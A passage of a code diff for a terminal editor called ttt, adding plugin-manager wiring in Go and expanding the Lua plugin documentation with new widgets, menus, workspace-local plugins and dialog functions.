 		editor.PendingPluginApprovals = pendingApprovals

--- a/cmd/ttt/main.go
+++ b/cmd/ttt/main.go
@@ -179,6 +179,37 @@ Docs: https://tttedit.dev
 			screen.PostEvent(tcell.NewEventInterrupt(result))
 		}
 	}
+
+	editor.RegisterStartupPluginCommands()
+
+	pluginsPanel := app.NewPluginsPanel(pluginManager)
+	editor.Sidebar.AddPanel("plugins", "Plugins", pluginsPanel.Adapter)
+	editor.PluginsPanel = pluginsPanel
+	pluginsPanel.OnInstall = func(repoURL string) {
+		editor.PluginInstallFromURL(repoURL)
+	}
+	pluginsPanel.OnUninstall = func(name string) {
+		editor.PluginUninstallByName(name)
+	}
+	pluginsPanel.OnToggle = func(name string, enabled bool) {
+		if err := pluginManager.SetEnabled(name, enabled); err != nil {
+			slog.Error("toggle plugin", "error", err)
+		}
+		pluginsPanel.Refresh()
+	}
+	pluginsPanel.OnUpdate = func(name string) {
+		editor.PluginUpdateByName(name)
+	}
+
+	go func() {
+		entries, err := plugin.FetchRemoteRegistry(plugin.DefaultRegistryURL)
+		if err != nil {
+			slog.Debug("fetch plugin registry", "error", err)
+			return
+		}
+		screen.PostEvent(tcell.NewEventInterrupt(&app.RemoteRegistryResult{Entries: entries}))
+	}()
+
 	if len(pendingApprovals) > 0 {
 		editor.PendingPluginApprovals = pendingApprovals
 	}

--- a/cmd/ttt/main.go
+++ b/cmd/ttt/main.go
@@ -166,9 +166,17 @@ Docs: https://tttedit.dev
 	for _, reg := range pluginManager.BottomPanels {
 		editor.BottomPanel.AddPanel(reg.ID, reg.Title, ui.NewWidgetAdapter(reg.Widget))
 	}
+	pluginManager.SetEditorAPI(app.NewPluginEditorAPI(editor))
+	pluginManager.SetFilesystemAPI(app.NewPluginFilesystemAPI())
+	pluginManager.SetSystemAPI(app.NewPluginSystemAPI())
+	pluginManager.SetNetworkAPI(app.NewPluginNetworkAPI())
+
 	for _, p := range pluginManager.Plugins() {
 		p.RequestRedraw = func() {
 			screen.PostEvent(tcell.NewEventInterrupt(nil))
+		}
+		p.PostAsync = func(result *plugin.PluginAsyncResult) {
+			screen.PostEvent(tcell.NewEventInterrupt(result))
 		}
 	}
 	if len(pendingApprovals) > 0 {

--- a/docs/PLUGINS.md
+++ b/docs/PLUGINS.md
@@ -7,14 +7,23 @@ ttt supports Lua plugins that can render panels in the sidebar and bottom panel 
 - [Getting Started](#getting-started)
 - [Plugin Lifecycle](#plugin-lifecycle)
 - [Registration](#registration)
+  - [Sidebar Panel](#sidebar-panel)
+  - [Bottom Panel](#bottom-panel)
   - [Commands](#commands)
   - [Keybindings](#keybindings)
+- [ttt Module Functions](#ttt-module-functions)
 - [Widget API](#widget-api)
   - [Label](#label)
+  - [Title](#title)
+  - [Key-Value List](#key-value-list)
   - [Tree](#tree)
   - [List](#list)
   - [Button](#button)
   - [Input](#input)
+  - [VStack](#vstack)
+  - [Box](#box)
+  - [Dropdown](#dropdown)
+  - [Box Model](#box-model)
   - [Requesting Redraws](#requesting-redraws)
 - [Raw Cell API](#raw-cell-api)
 - [Mixing Widgets and Raw Cells](#mixing-widgets-and-raw-cells)
@@ -41,7 +50,14 @@ ttt supports Lua plugins that can render panels in the sidebar and bottom panel 
 
 ### Directory Structure
 
-Plugins live in `~/.config/ttt/plugins/<plugin-name>/`. Each plugin is a directory containing a manifest file and one or more Lua source files:
+Plugins live in one of two locations:
+
+- **Global:** `~/.config/ttt/plugins/<plugin-name>/` — available in all sessions.
+- **Workspace-local:** `<workspace-root>/plugins/<plugin-name>/` — scoped to a specific project. The workspace root is the primary folder opened by ttt.
+
+If a plugin with the same name exists in both locations, the global one takes precedence.
+
+Each plugin is a directory containing a manifest file and one or more Lua source files:
 
 ```
 ~/.config/ttt/plugins/my-plugin/
@@ -66,14 +82,14 @@ Every plugin requires a `plugin.ttt.json` manifest file at the root of its direc
 }
 ```
 
-| Field         | Required | Description                                         |
-|---------------|----------|-----------------------------------------------------|
-| `name`        | yes      | Unique plugin identifier. Must match directory name. |
-| `description` | no       | Shown in the plugin list dialog.                    |
-| `version`     | no       | Semver version string.                              |
-| `author`      | no       | Plugin author name.                                 |
-| `entry`       | yes      | Path to the Lua entry point, relative to the plugin directory. |
-| `permissions` | no       | Object declaring required permissions (see [Permissions Reference](#permissions-reference)). |
+| Field         | Type   | Required | Description                                         |
+|---------------|--------|----------|-----------------------------------------------------|
+| `name`        | string | yes      | Unique plugin identifier. Must match directory name. |
+| `description` | string | no       | Shown in the plugin list dialog.                    |
+| `version`     | string | no       | Semver version string.                              |
+| `author`      | string | no       | Plugin author name.                                 |
+| `entry`       | string | yes      | Path to the Lua entry point, relative to the plugin directory. |
+| `permissions` | object | no       | Object declaring required permissions (see [Permissions Reference](#permissions-reference)). |
 
 ### Minimal Example
 
@@ -108,7 +124,7 @@ ttt.register({
 
 ### Loading
 
-1. On startup, ttt scans `~/.config/ttt/plugins/` for directories containing `plugin.ttt.json`.
+1. On startup, ttt scans `~/.config/ttt/plugins/` and `<workspace-root>/plugins/` for directories containing `plugin.ttt.json`.
 2. For each plugin, the manifest is parsed and permissions are compared against the user's stored approvals in `~/.config/ttt/plugins.ttt.json`.
 3. If the plugin has been approved and its permissions haven't changed, it loads immediately: a sandboxed Lua VM is created, the entry file is executed, and `ttt.register()` wires up the panels.
 4. If the plugin is new or its permissions have changed since approval, an approval dialog appears showing the requested permissions. The user can Allow or Cancel.
@@ -129,22 +145,18 @@ Run **Plugins: Reload** from the command palette to reload a plugin without rest
 
 ## Registration
 
-The entry point Lua file must call `ttt.register()` to declare what the plugin provides. The `ttt` module also provides `ttt.log()` for logging (see [Logging](#logging)).
-
-`ttt.register()` accepts a table with `sidebar`, `bottom`, `commands`, and/or `keybindings` fields. A plugin can register any combination:
+The entry point Lua file must call `ttt.register()` to declare what the plugin provides. `ttt.register()` accepts a single table with `sidebar`, `bottom`, `commands`, and/or `keybindings` fields. A plugin can register any combination:
 
 ```lua
 local ttt = require("ttt")
 
 ttt.register({
   sidebar = {
-    title = "Panel Title",       -- tab label
-    render = function(panel)     -- called each render frame
-      -- build UI here
-    end,
-    on_event = function(event)   -- optional: fallback event handler
-      -- handle key/mouse events not consumed by widgets
-    end,
+    title = "Panel Title",
+    render = function(panel) end,
+    on_event = function(event) end,
+    actions = { ... },
+    on_action = function(command) end,
   },
   bottom = {
     title = "Output",
@@ -152,9 +164,7 @@ ttt.register({
     on_event = function(event) end,
   },
   commands = {
-    { id = "myplugin.doSomething", title = "My Plugin: Do Something", handler = function()
-      -- command logic here
-    end },
+    { id = "myplugin.doSomething", title = "My Plugin: Do Something", handler = function() end },
   },
   keybindings = {
     { key = "ctrl+k d", command = "myplugin.doSomething" },
@@ -162,17 +172,48 @@ ttt.register({
 })
 ```
 
-### Panel Fields
+### Sidebar Panel
 
-| Field      | Required | Description                                                    |
-|------------|----------|----------------------------------------------------------------|
-| `title`    | yes      | Displayed as the panel's tab label.                            |
-| `render`   | yes      | Function called each render frame. Receives a panel proxy object. |
-| `on_event` | no       | Fallback handler for key/mouse events not consumed by widgets. |
+Sidebar panels appear in the left sidebar alongside the file explorer. Requires the `panel.sidebar` permission.
 
-**Sidebar** panels appear in the left sidebar alongside the file explorer. They require the `panel.sidebar` permission.
+| Field       | Type     | Required | Description                                                             |
+|-------------|----------|----------|-------------------------------------------------------------------------|
+| `title`     | string   | yes      | Displayed as the panel's tab label.                                     |
+| `render`    | function | yes      | Called each render frame. Receives a [panel proxy](#widget-api) object. |
+| `on_event`  | function | no       | Fallback handler for key/mouse events not consumed by widgets.          |
+| `actions`   | table    | no       | Array of menu entries for the panel's "..." header menu.                |
+| `on_action` | function | no       | Callback when a header menu action is selected. Receives the command string. |
 
-**Bottom** panels appear in the bottom panel alongside the terminal. They require the `panel.bottom` permission.
+The `actions` array defines entries for the sidebar panel's header menu (the "..." button). Each entry uses the [menu entry format](#menu-entry-format):
+
+```lua
+sidebar = {
+  title = "Docker",
+  actions = {
+    { label = "Refresh All", command = "refresh" },
+    { separator = true },
+    { label = "Prune Containers", command = "prune_containers" },
+  },
+  on_action = function(command)
+    if command == "refresh" then
+      refresh()
+    elseif command == "prune_containers" then
+      prune()
+    end
+  end,
+  render = function(panel) ... end,
+}
+```
+
+### Bottom Panel
+
+Bottom panels appear in the bottom panel alongside the terminal. Requires the `panel.bottom` permission.
+
+| Field      | Type     | Required | Description                                                    |
+|------------|----------|----------|----------------------------------------------------------------|
+| `title`    | string   | yes      | Displayed as the panel's tab label.                            |
+| `render`   | function | yes      | Called each render frame. Receives a panel proxy object.       |
+| `on_event` | function | no       | Fallback handler for key/mouse events not consumed by widgets. |
 
 ### Commands
 
@@ -180,11 +221,11 @@ Plugins can register commands that appear in the command palette. Requires the `
 
 Each command entry is a table with:
 
-| Field     | Required | Description                              |
-|-----------|----------|------------------------------------------|
-| `id`      | yes      | Unique command ID (e.g. `myplugin.run`). |
-| `title`   | yes      | Display title in the command palette.     |
-| `handler` | yes      | Function called when the command runs.    |
+| Field     | Type     | Required | Description                              |
+|-----------|----------|----------|------------------------------------------|
+| `id`      | string   | yes      | Unique command ID (e.g. `myplugin.run`). |
+| `title`   | string   | yes      | Display title in the command palette.     |
+| `handler` | function | yes      | Function called when the command runs.    |
 
 ### Keybindings
 
@@ -192,12 +233,74 @@ Plugins can register keyboard shortcuts for their commands. Requires the `keybin
 
 Each keybinding entry is a table with:
 
-| Field     | Required | Description                                           |
-|-----------|----------|-------------------------------------------------------|
-| `key`     | yes      | Key combination string (e.g. `ctrl+k d` for a chord). |
-| `command` | yes      | Command ID to execute when the key is pressed.        |
+| Field     | Type   | Required | Description                                           |
+|-----------|--------|----------|-------------------------------------------------------|
+| `key`     | string | yes      | Key combination string (e.g. `ctrl+k d` for a chord). |
+| `command` | string | yes      | Command ID to execute when the key is pressed.        |
 
 Use `ctrl+k <key>` chords for plugin keybindings to avoid conflicts with built-in shortcuts. Avoid `ctrl+shift` combos — they are unreliable in many terminals.
+
+---
+
+## ttt Module Functions
+
+These functions are available on the `ttt` module directly:
+
+```lua
+local ttt = require("ttt")
+```
+
+### `ttt.register(config)`
+
+Registers the plugin's panels, commands, and keybindings. See [Registration](#registration) for the full config table format.
+
+### `ttt.log(message)` / `ttt.log(level, message)`
+
+Log a message to the OUTPUT panel. No permission required.
+
+```lua
+ttt.log("plugin loaded")                -- defaults to "info" level
+ttt.log("warn", "config not found")     -- explicit level
+ttt.log("error", "connection failed")   -- error level
+```
+
+See [Logging](#logging) for details.
+
+### `ttt.confirm(message, callback)`
+
+Show a confirmation dialog. The callback is called (with no arguments) only if the user clicks "Allow" / confirms.
+
+| Parameter  | Type     | Description                                       |
+|------------|----------|---------------------------------------------------|
+| `message`  | string   | Question or warning text shown in the dialog.     |
+| `callback` | function | Called with no arguments if the user confirms.    |
+
+```lua
+ttt.confirm("Remove container 'web-app'?", function()
+  -- only runs if user confirmed
+  sys.exec_async("docker", {"rm", "-f", "web-app"}, function(result)
+    ttt.log("Removed container")
+    panel:redraw()
+  end)
+end)
+```
+
+### `ttt.show_info(title, entries)`
+
+Show an informational dialog with key-value pairs.
+
+| Parameter | Type   | Description                                          |
+|-----------|--------|------------------------------------------------------|
+| `title`   | string | Dialog title.                                        |
+| `entries` | table  | Array of `{key = string, value = string}` tables.    |
+
+```lua
+ttt.show_info("Shortcuts", {
+  { key = "r", value = "Refresh all" },
+  { key = "Enter", value = "Expand / collapse" },
+  { key = "Ctrl+K r", value = "Refresh (global)" },
+})
+```
 
 ---
 
@@ -209,27 +312,80 @@ The render function is called every time the panel needs to redraw. Widget state
 
 ### Label
 
-Display a line of text, optionally styled.
+Display a line of text, optionally styled with a badge.
 
 **Simple string form:**
 
 ```lua
 panel:label("Status: OK")
-panel:label("Some text")
 ```
 
-**Table form (with style):**
+**Table form (with style and badge):**
 
 ```lua
 panel:label({ text = "Error occurred!", style = "danger" })
-panel:label({ text = "Hint: press Enter", style = "muted" })
+panel:label({ text = "Containers", style = "muted", badge = "5" })
+panel:label({ text = "Hint: press Enter", style = "muted", padding_left = 1 })
 ```
 
-| Parameter | Type           | Description                          |
-|-----------|----------------|--------------------------------------|
-| argument  | string or table | String for simple text. Table with `text` and optional `style` fields. |
+| Field   | Type   | Required | Description                                       |
+|---------|--------|----------|---------------------------------------------------|
+| `text`  | string | yes      | Label text to display.                            |
+| `style` | string | no       | Named style (see [Styles](#styles)). Default: `"default"`. |
+| `badge` | string | no       | Badge text displayed after the label.             |
+| + [box model fields](#box-model) | | | Margin and padding. |
 
 Labels are not focusable — they display text only and don't receive keyboard events.
+
+---
+
+### Title
+
+Bold heading text. Renders in a prominent style.
+
+**Simple string form:**
+
+```lua
+panel:title("Section Header")
+```
+
+**Table form:**
+
+```lua
+panel:title({ text = "CONTAINERS", margin_top = 1, margin_bottom = 1 })
+```
+
+| Field  | Type   | Required | Description            |
+|--------|--------|----------|------------------------|
+| `text` | string | yes      | Title text to display. |
+| + [box model fields](#box-model) | | | Margin and padding. |
+
+Titles are not focusable.
+
+---
+
+### Key-Value List
+
+Display a list of key-value pairs, aligned in two columns.
+
+```lua
+panel:keyvalue({
+  { key = "Status", value = "Running" },
+  { key = "Image",  value = "nginx:latest" },
+  { key = "Port",   value = "8080:80" },
+})
+```
+
+The argument is an array of tables, each with:
+
+| Field   | Type   | Required | Description   |
+|---------|--------|----------|---------------|
+| `key`   | string | yes      | Left column.  |
+| `value` | string | yes      | Right column. |
+
+The outer table also supports [box model fields](#box-model) for margin/padding.
+
+Key-value lists are not focusable.
 
 ---
 
@@ -243,51 +399,45 @@ panel:tree({
     {
       id = "src",
       label = "src/",
-      icon = "📁",
+      icon = "\xF0\x9F\x93\x81",
       expandable = true,
       expanded = true,
       children = {
-        { id = "main.go", label = "main.go", icon = "📄" },
-        { id = "util.go", label = "util.go", icon = "📄", muted = true },
+        { id = "main.go", label = "main.go", icon = "\xF0\x9F\x93\x84" },
+        { id = "util.go", label = "util.go", icon = "\xF0\x9F\x93\x84", muted = true },
       },
     },
-    { id = "readme", label = "README.md", icon = "📄", badge = "modified" },
+    { id = "readme", label = "README.md", icon = "\xF0\x9F\x93\x84", badge = "modified" },
   },
   indent = 2,
   on_select = function(node)
     -- called when a node is activated (Enter key or double-click)
   end,
   on_expand = function(node)
-    -- called when a node is expanded
+    -- called when a node is expanded/collapsed
   end,
+  on_command = function(command, node)
+    -- called when a context menu command or inline action is triggered
+  end,
+  node_menu = {
+    { label = "Open", command = "open" },
+    { label = "Delete", command = "delete" },
+  },
 })
 ```
 
 **Tree config fields:**
 
-| Field       | Type     | Default | Description                                    |
-|-------------|----------|---------|------------------------------------------------|
-| `items`     | table    | `{}`    | Array of tree node tables (see below).         |
-| `indent`    | number   | `2`     | Number of spaces per nesting level.            |
-| `on_select` | function | nil     | Callback when a node is activated.             |
-| `on_expand` | function | nil     | Callback when a node is expanded.              |
+| Field        | Type     | Default | Description                                    |
+|--------------|----------|---------|------------------------------------------------|
+| `items`      | table    | `{}`    | Array of [tree node tables](#tree-node-format). |
+| `indent`     | number   | `2`     | Number of spaces per nesting level.            |
+| `on_select`  | function | nil     | Callback when a node is activated (Enter or double-click). Receives the node table. |
+| `on_expand`  | function | nil     | Callback when a node is expanded or collapsed. Receives the node table. |
+| `on_command` | function | nil     | Callback when a context menu command is selected. Receives `(command, node)`. |
+| `node_menu`  | table    | nil     | Array of [menu entries](#menu-entry-format) for right-click context menu on nodes. |
 
-**Tree node fields:**
-
-| Field        | Type    | Default | Description                                  |
-|--------------|---------|---------|----------------------------------------------|
-| `id`         | string  | —       | Unique identifier. Required for state preservation. |
-| `label`      | string  | `""`    | Display text.                                |
-| `icon`       | string  | `""`    | Icon string displayed before the label.      |
-| `badge`      | string  | `""`    | Badge text displayed after the label.        |
-| `muted`      | bool    | `false` | Render the label in a dimmed style.          |
-| `expandable` | bool    | `false` | Show expand/collapse chevron indicator.      |
-| `expanded`   | bool    | `false` | Initial expanded state (only used on first render — see [Reconciliation](#reconciliation-and-state-preservation)). |
-| `children`   | table   | `{}`    | Array of child node tables.                  |
-
-**Callback argument:** Both `on_select` and `on_expand` receive a Lua table with the same fields as the node that was interacted with (`id`, `label`, `icon`, `badge`, `muted`, `expanded`), plus a `children` table if the node has children.
-
-**Keyboard navigation:** When focused, arrow keys move selection, Enter activates `on_select`, Left/Right collapse/expand nodes.
+**Keyboard navigation:** When focused, Up/Down arrows move selection, Enter activates `on_select`, Left/Right collapse/expand nodes. Shift+Enter opens the context menu on the selected node.
 
 ---
 
@@ -298,24 +448,33 @@ Flat list — functionally identical to a tree but without nesting or expand/col
 ```lua
 panel:list({
   items = {
-    { id = "item1", label = "First item", icon = "•" },
-    { id = "item2", label = "Second item", icon = "•", badge = "new" },
+    { id = "item1", label = "First item", icon = "o" },
+    { id = "item2", label = "Second item", icon = "o", badge = "new" },
     { id = "item3", label = "Third item", muted = true },
   },
   on_select = function(node)
     -- called when an item is activated
   end,
+  on_command = function(command, node)
+    -- called when a context menu command is triggered
+  end,
+  node_menu = {
+    { label = "Start", command = "start" },
+    { label = "Stop", command = "stop" },
+    { separator = true },
+    { label = "Remove", command = "remove" },
+  },
 })
 ```
 
 **List config fields:**
 
-| Field       | Type     | Description                                    |
-|-------------|----------|------------------------------------------------|
-| `items`     | table    | Array of item tables (same fields as tree nodes). |
-| `on_select` | function | Callback when an item is activated.            |
-
-Items use the same field format as [tree nodes](#tree).
+| Field        | Type     | Default | Description                                            |
+|--------------|----------|---------|--------------------------------------------------------|
+| `items`      | table    | `{}`    | Array of [tree node tables](#tree-node-format).        |
+| `on_select`  | function | nil     | Callback when an item is activated. Receives the node table. |
+| `on_command` | function | nil     | Callback when a context menu command is selected. Receives `(command, node)`. |
+| `node_menu`  | table    | nil     | Array of [menu entries](#menu-entry-format) for the right-click context menu. |
 
 ---
 
@@ -334,10 +493,10 @@ panel:button({
 
 **Button config fields:**
 
-| Field      | Type     | Description                                    |
-|------------|----------|------------------------------------------------|
-| `label`    | string   | Button text. Use `&` for an accelerator: `"&Save"` underlines S. |
-| `on_click` | function | Callback when the button is pressed.           |
+| Field      | Type     | Required | Description                                    |
+|------------|----------|----------|------------------------------------------------|
+| `label`    | string   | yes      | Button text. Use `&` for an accelerator: `"&Save"` underlines S. |
+| `on_click` | function | no       | Callback when the button is pressed.           |
 
 ---
 
@@ -348,7 +507,7 @@ Single-line text input with placeholder text and optional prefix.
 ```lua
 panel:input({
   placeholder = "Type to search...",
-  prefix = "🔍 ",
+  prefix = "# ",
   on_change = function(text)
     -- called on every keystroke with the current text
   end,
@@ -364,10 +523,176 @@ panel:input({
 |---------------|----------|---------|------------------------------------------------|
 | `placeholder` | string   | `""`    | Grayed-out hint text shown when input is empty.|
 | `prefix`      | string   | `""`    | Non-editable text displayed before the input.  |
-| `on_change`   | function | nil     | Called after every text change. Receives the current text as a string. |
-| `on_submit`   | function | nil     | Called when Enter is pressed. Receives the current text as a string. |
+| `on_change`   | function | nil     | Called after every text change. Receives the current text (string). |
+| `on_submit`   | function | nil     | Called when Enter is pressed. Receives the current text (string). |
 
 The input text and cursor position are automatically preserved across re-renders.
+
+---
+
+### VStack
+
+Vertical stack layout container. Groups child widgets with an optional gap between them.
+
+```lua
+panel:vstack({
+  gap = 1,
+  render = function(p)
+    p:label({ text = "Section Title", style = "muted" })
+    p:button({ label = "&Action", on_click = function() end })
+  end,
+})
+```
+
+**VStack config fields:**
+
+| Field    | Type     | Required | Description                                                |
+|----------|----------|----------|------------------------------------------------------------|
+| `render` | function | yes      | Builder function that receives a child panel proxy. Call widget methods on it to add children. |
+| `gap`    | number   | no       | Vertical gap (in rows) between children. Default: `0`.     |
+
+VStack is useful for grouping related widgets into sections. The child panel proxy supports all the same widget methods.
+
+---
+
+### Box
+
+Container with optional borders and fixed height. Wraps child widgets.
+
+```lua
+panel:box({
+  border = true,
+  render = function(p)
+    p:list({
+      items = items,
+      on_select = function(node) end,
+    })
+  end,
+})
+```
+
+**Box config fields:**
+
+| Field           | Type     | Default | Description                                    |
+|-----------------|----------|---------|------------------------------------------------|
+| `render`        | function | yes     | Builder function that receives a child panel proxy. |
+| `border`        | boolean  | false   | Draw a full border around the box.             |
+| `border_top`    | boolean  | false   | Draw only the top border.                      |
+| `border_bottom` | boolean  | false   | Draw only the bottom border.                   |
+| `border_left`   | boolean  | false   | Draw only the left border.                     |
+| `border_right`  | boolean  | false   | Draw only the right border.                    |
+| `height`        | number   | 0       | Fixed height in rows. `0` means auto-size.     |
+
+Individual `border_*` flags can be combined. If `border` is true, all four sides are drawn regardless of individual flags.
+
+**Example with sections:**
+
+```lua
+panel:vstack({
+  render = function(p)
+    p:label({ text = "Containers", badge = "3", padding_left = 1 })
+    p:box({
+      border = true,
+      render = function(bp)
+        bp:list({ items = container_items })
+      end,
+    })
+  end,
+})
+```
+
+---
+
+### Dropdown
+
+A button that opens a context menu when clicked.
+
+```lua
+panel:dropdown({
+  label = "Actions",
+  entries = {
+    { label = "Start", command = "start" },
+    { label = "Stop", command = "stop" },
+    { separator = true },
+    { label = "Remove", command = "remove" },
+  },
+  on_menu = function(command)
+    if command == "start" then ... end
+  end,
+})
+```
+
+**Dropdown config fields:**
+
+| Field     | Type     | Required | Description                                                |
+|-----------|----------|----------|------------------------------------------------------------|
+| `label`   | string   | yes      | Button text displayed.                                     |
+| `entries` | table    | yes      | Array of [menu entries](#menu-entry-format) for the popup. |
+| `on_menu` | function | no       | Callback when a menu item is selected. Receives the command string. |
+
+---
+
+### Tree Node Format
+
+Used in `items` arrays for both `tree` and `list` widgets.
+
+| Field        | Type    | Default | Description                                  |
+|--------------|---------|---------|----------------------------------------------|
+| `id`         | string  | `""`    | Unique identifier. **Required for state preservation.** |
+| `label`      | string  | `""`    | Display text.                                |
+| `icon`       | string  | `""`    | Icon string displayed before the label.      |
+| `badge`      | string  | `""`    | Badge text displayed after the label.        |
+| `muted`      | boolean | `false` | Render the label in a dimmed style.          |
+| `expandable` | boolean | `false` | Show expand/collapse chevron indicator. Auto-set to `true` if `children` is non-empty. |
+| `expanded`   | boolean | `false` | Initial expanded state (only used on first render — see [Reconciliation](#reconciliation-and-state-preservation)). |
+| `children`   | table   | `{}`    | Array of child node tables (recursive).      |
+
+**Callback argument:** `on_select` and `on_expand` callbacks receive a Lua table with the same fields as the node: `id`, `label`, `icon` (if non-empty), `badge` (if non-empty), `expanded`, `muted`, and `children` (if present). The `on_command` callback receives two arguments: `(command_string, node_table)`.
+
+---
+
+### Menu Entry Format
+
+Used in `actions` (sidebar header menu), `node_menu` (tree/list context menu), and `entries` (dropdown).
+
+| Field       | Type    | Required | Description                             |
+|-------------|---------|----------|-----------------------------------------|
+| `label`     | string  | yes*     | Display text of the menu item.          |
+| `command`   | string  | yes*     | Command identifier passed to the callback. |
+| `separator` | boolean | no       | If `true`, renders as a separator line instead of an item. When `true`, `label` and `command` are ignored. |
+
+```lua
+{
+  { label = "Start", command = "start" },
+  { label = "Stop", command = "stop" },
+  { separator = true },
+  { label = "Remove", command = "remove" },
+}
+```
+
+---
+
+### Box Model
+
+Many widgets support margin and padding fields for spacing control. These fields can be included in the widget's configuration table.
+
+| Field            | Type   | Default | Description               |
+|------------------|--------|---------|---------------------------|
+| `margin_top`     | number | `0`     | Space above the widget.   |
+| `margin_bottom`  | number | `0`     | Space below the widget.   |
+| `margin_left`    | number | `0`     | Space to the left.        |
+| `margin_right`   | number | `0`     | Space to the right.       |
+| `padding_top`    | number | `0`     | Internal top padding.     |
+| `padding_bottom` | number | `0`     | Internal bottom padding.  |
+| `padding_left`   | number | `0`     | Internal left padding.    |
+| `padding_right`  | number | `0`     | Internal right padding.   |
+
+**Widgets that support box model:** `label`, `title`, `keyvalue`.
+
+```lua
+panel:label({ text = "Indented label", padding_left = 2, margin_top = 1 })
+panel:title({ text = "SECTION", margin_bottom = 1 })
+```
 
 ---
 
@@ -396,7 +721,7 @@ ttt.register({
 })
 ```
 
-`panel:redraw()` posts an event to the editor's event loop. The render function will be called again on the next frame, and the updated state will be reflected. This is safe to call from any callback.
+`panel:redraw()` posts an event to the editor's event loop. The render function will be called again on the next frame, and the updated state will be reflected. This is safe to call from any callback, including async callbacks.
 
 ---
 
@@ -424,16 +749,16 @@ panel:cell(1, 0, "Y", "success")              -- named style as string
 panel:cell(2, 0, "Z", { style = "danger" })   -- named style as table
 ```
 
-| Parameter | Type            | Description                                |
-|-----------|-----------------|--------------------------------------------|
-| `x`       | number          | Column (0-based).                          |
-| `y`       | number          | Row (0-based).                             |
-| `char`    | string          | Single character to draw (first rune used).|
-| `style`   | string or table | Optional. Named style string or table with `style` field. |
+| Parameter | Type            | Required | Description                                |
+|-----------|-----------------|----------|--------------------------------------------|
+| `x`       | number          | yes      | Column (0-based).                          |
+| `y`       | number          | yes      | Row (0-based).                             |
+| `char`    | string          | yes      | Single character to draw (first rune used).|
+| `style`   | string or table | no       | Named style string or table with `style` field. |
 
 ### `panel:text(x, y, text, [style])`
 
-Draw a text string starting at the given position.
+Draw a text string starting at the given position. Text is clipped to the panel width.
 
 ```lua
 panel:text(0, 0, "Hello World")                -- default style
@@ -441,27 +766,27 @@ panel:text(0, 1, "Error!", "danger")           -- named style as string
 panel:text(0, 2, "Hint", { style = "muted" }) -- named style as table
 ```
 
-| Parameter | Type            | Description                                |
-|-----------|-----------------|--------------------------------------------|
-| `x`       | number          | Starting column (0-based).                 |
-| `y`       | number          | Row (0-based).                             |
-| `text`    | string          | Text to draw.                              |
-| `style`   | string or table | Optional. Named style.                     |
+| Parameter | Type            | Required | Description                                |
+|-----------|-----------------|----------|--------------------------------------------|
+| `x`       | number          | yes      | Starting column (0-based).                 |
+| `y`       | number          | yes      | Row (0-based).                             |
+| `text`    | string          | yes      | Text to draw.                              |
+| `style`   | string or table | no       | Named style.                               |
 
 ### `panel:clear(x, y, w, h)`
 
-Clear a rectangular region, filling it with spaces.
+Clear a rectangular region, filling it with spaces in the default style.
 
 ```lua
 panel:clear(0, 0, 40, 10)
 ```
 
-| Parameter | Type   | Description         |
-|-----------|--------|---------------------|
-| `x`       | number | Left column.        |
-| `y`       | number | Top row.            |
-| `w`       | number | Width in cells.     |
-| `h`       | number | Height in cells.    |
+| Parameter | Type   | Required | Description         |
+|-----------|--------|----------|---------------------|
+| `x`       | number | yes      | Left column.        |
+| `y`       | number | yes      | Top row.            |
+| `w`       | number | yes      | Width in cells.     |
+| `h`       | number | yes      | Height in cells.    |
 
 ---
 
@@ -480,7 +805,7 @@ render = function(panel)
   -- Raw drawing below
   local w, h = panel:size()
   for x = 0, w - 1 do
-    panel:cell(x, 2, "─", "border")
+    panel:cell(x, 2, "-", "border")
   end
   panel:text(0, 3, "Custom rendered content")
 end
@@ -550,12 +875,13 @@ The widget system uses a **reconciliation** algorithm to preserve interactive st
 
 The plugin panel manages its own focus system. When the plugin panel is focused:
 
-- **Tab** / **Shift+Tab** cycles focus between focusable widgets (trees, lists, inputs, buttons).
+- **Tab** / **Shift+Tab** cycles focus between focusable widgets (trees, lists, inputs, buttons, dropdowns).
 - **Arrow keys** navigate within the focused widget (e.g., up/down in a tree).
 - **Enter** / **Space** activate the focused widget (select tree node, press button, submit input).
+- **Shift+Enter** opens the context menu on the selected tree/list node (if `node_menu` is defined).
 - Events not consumed by the focused widget fall through to the `on_event` handler.
 
-Labels are not focusable. If your panel has only labels and raw cells, all events go directly to `on_event`.
+Labels, titles, and key-value lists are not focusable. If your panel has only non-focusable widgets and raw cells, all events go directly to `on_event`.
 
 ---
 
@@ -567,14 +893,17 @@ There are two levels of event handling:
 
 Widget-specific events are routed automatically to the callbacks you provide:
 
-| Widget | Event        | Callback     | Argument                            |
-|--------|--------------|--------------|-------------------------------------|
-| Tree   | node activated | `on_select` | Node table (`{id, label, ...}`)     |
-| Tree   | node expanded  | `on_expand` | Node table                          |
-| List   | item activated | `on_select` | Node table                          |
-| Button | pressed      | `on_click`   | (none)                              |
-| Input  | text changed | `on_change`  | Current text (string)               |
-| Input  | Enter pressed| `on_submit`  | Current text (string)               |
+| Widget   | Event              | Callback     | Argument(s)                         |
+|----------|--------------------|--------------|-------------------------------------|
+| Tree     | node activated     | `on_select`  | Node table (`{id, label, ...}`)     |
+| Tree     | node expanded      | `on_expand`  | Node table                          |
+| Tree     | context menu cmd   | `on_command` | `(command_string, node_table)`      |
+| List     | item activated     | `on_select`  | Node table                          |
+| List     | context menu cmd   | `on_command` | `(command_string, node_table)`      |
+| Button   | pressed            | `on_click`   | (none)                              |
+| Input    | text changed       | `on_change`  | Current text (string)               |
+| Input    | Enter pressed      | `on_submit`  | Current text (string)               |
+| Dropdown | menu item selected | `on_menu`    | Command string                      |
 
 ### 2. Fallback Event Handler (`on_event`)
 
@@ -588,7 +917,8 @@ For key and mouse events not consumed by widgets, the `on_event` function receiv
   key = "Enter",     -- key name: "Enter", "Tab", "Escape", "Up", "Down", "Left", "Right",
                      -- "Backspace", "Delete", "Home", "End", "PgUp", "PgDn",
                      -- or the character itself ("a", "A", "1", "/", etc.)
-  mod = "ctrl",      -- modifier: "ctrl", "shift", "alt", or nil for no modifier
+  rune = "a",        -- only set for printable character keys
+  mod = "ctrl",      -- modifier: "ctrl", "alt", "shift", or "" for no modifier
 }
 ```
 
@@ -599,7 +929,7 @@ For key and mouse events not consumed by widgets, the `on_event` function receiv
   type = "mouse",
   x = 5,             -- column (0-based, relative to panel)
   y = 10,            -- row (0-based, relative to panel)
-  button = "left",   -- "left", "right", "middle"
+  button = "left",   -- "left", "right", "middle", "wheel_up", "wheel_down", or "none"
 }
 ```
 
@@ -608,7 +938,7 @@ For key and mouse events not consumed by widgets, the `on_event` function receiv
 ```lua
 on_event = function(event)
   if event.type == "key" then
-    if event.key == "r" and event.mod == nil then
